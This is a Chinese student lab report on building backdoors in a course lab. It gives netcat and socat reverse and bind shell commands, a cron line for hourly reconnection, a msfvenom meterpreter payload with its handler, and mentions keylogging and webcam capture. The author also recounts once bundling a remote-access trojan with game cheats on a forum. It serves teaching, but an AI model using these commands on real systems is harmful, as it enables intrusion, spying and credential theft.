20154327 Exp2 后门原理与实践
实践内容
-
使用netcat和socat、msf-meterpreter等工具获得主机权限,并进行一些恶意行为,如监控摄像头、记录键盘输入、截屏等。
-
详情见实验指导书
实践过程
netcat
netcat获取主机操作Shell,cron启动
windows获得linux的shell
-
windows平台下利用cmd的ipconfig命令查看到本机的ip地址为172.30.6.204
-
kali在终端下使用ifconfig命令查看kali的IP地址为172.30.1.193
-
windows下使用ncat.exe -l -p 4327命令运行ncat.exe监听4327端口。
-
kali下使用为nc 172.30.6.204(即主机ip) 4327 -e /bin/sh命令连接windows的4327端口。
-
连接成功后,我们就可以在windows主机获取kali的信息,如输入ls命令:
linux获得windows的shell
- kali下使用nc -l -p 4327命令监听4327端口。
- windows下使用ncat.exe -e cmd.exe 172.30.1.193 4327(即kali的IP地址)连接kali的4327端口。
- 连接成功后,我们就可以在kali主机获取windows的信息,此时已成功获取windows的shell。
使用netcat传输数据
-
windows下使用ncat.exe -l -p 4327命令运行ncat.exe监听4327端口。
-
kali下使用为nc 172.30.6.204(即主机ip) 4327命令连接windows的4327端口。
-
建立连接后,尝试传输。
cron启动
-
windows下使用ncat.exe -l -p 4327命令运行ncat.exe监听4327端口。
-
kali下使用crontab -e命令,设置一条定时指令,因为现在是22:15,所以我设置成在每小时的第20分钟反向连接windows主机的4327端口。
-
20 * * * * /bin/netcat 172.30.6.204 4327 -e /bin/sh
-
20分时连接成功,成功获得linux的shell,输入ls指令查看。(这里由于我使用的是中文版,所以桌面、文档、下载等均无法正常显示)
socat
socat获取主机操作Shell, 任务计划启动。
- windows下在控制面板->管理工具->任务计划程序中新建一个触发器。
- 再新建一个操作,程序路径选择socat.exe的安装路径,填写参数tcp-listen:4327 exec:cmd.exe,pty,stderr
- 待重启后,刷新任务,可看到任务已经开始执行。
- kali下使用socat - tcp:172.30.6.204(即主机ip):4327(端口),此时已成功获取windows的shell。
msf-meterpreter
msf-meterpreter 生成后门,传输到靶机获取shell
- 在kali下输入命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.1.193 LPORT=4327 -f exe > 20154327.exe 生成一个名为20154327的后门程序
-
使用netcat将这个后门程序传输到windows主机上。
-
首先我们在windows下输入ncat.exe -lv 4327 > 20154327.exe
-
随后在Linux下使用ncat -nv 172.30.6.204 4327 < 20154327.exe命令把文件传送过去
- 这里在杀毒软件上设置20154327.exe为信任程序,后运行
使用msf获取目标摄像头,进行录屏、键盘记录等操作
- 首先msf打开监听进程
- msfconsole //进入msf
- use exploit/multi/handler //进入handler模式
- set payload windows/meterpreter/reverse_tcp //设置payload
- set LHOST 172.30.1.193 //将LHOST设置为LinuxIP地址
- set LPORT 4327 //设端口为那个4327
- exploit //MSF开始监听
查看系统信息、获取键盘输入、截获摄像头
- 系统信息:
- 键盘记录:
- 摄像头:
- 提权:
基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
答:以前尝试过,将生成好的灰鸽子文件和cf游戏外挂捆绑在一起,然后上传到游戏论坛上,并注明,因为有注入,所以会被误报,关闭杀软运行,等待肉鸡上线。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
答:如上例所说的捆绑方式,还有将自己设为开机启动,在开机后自动运行,以及伪装文件,将自己伪装成常用软件,等待用户点击。
(3)Meterpreter有哪些给你映像深刻的功能?
答:打开摄像头录拍,平时家里电脑放在桌子上,都是正对着床,以后还是用卫生纸挡住。
(4)如何发现自己有系统有没有被安装后门?
答:查看当前电脑的开机项,检测是否有未知项,查看电脑是否存在异常,例如莫名其妙出现的“全家桶”、cpu硬盘等占用异常。
实验心得与体会
- 这次实验相比以前的实验显得有趣多了,体会到了网络攻防的乐趣,做到了以前以为只有hacker才能做到的事情,翻看他人的文件、记录他人的密码、利用摄像头进行录拍。再想想之后学会了免杀,就可以绕过安全软件了,不禁有些感叹,只学了几节课,就可以绕过市面上的杀软,入侵到别人的电脑中。可想而知,网上拥有黑客技术并不去约束自己的人应该会很多,信息安全任重道远。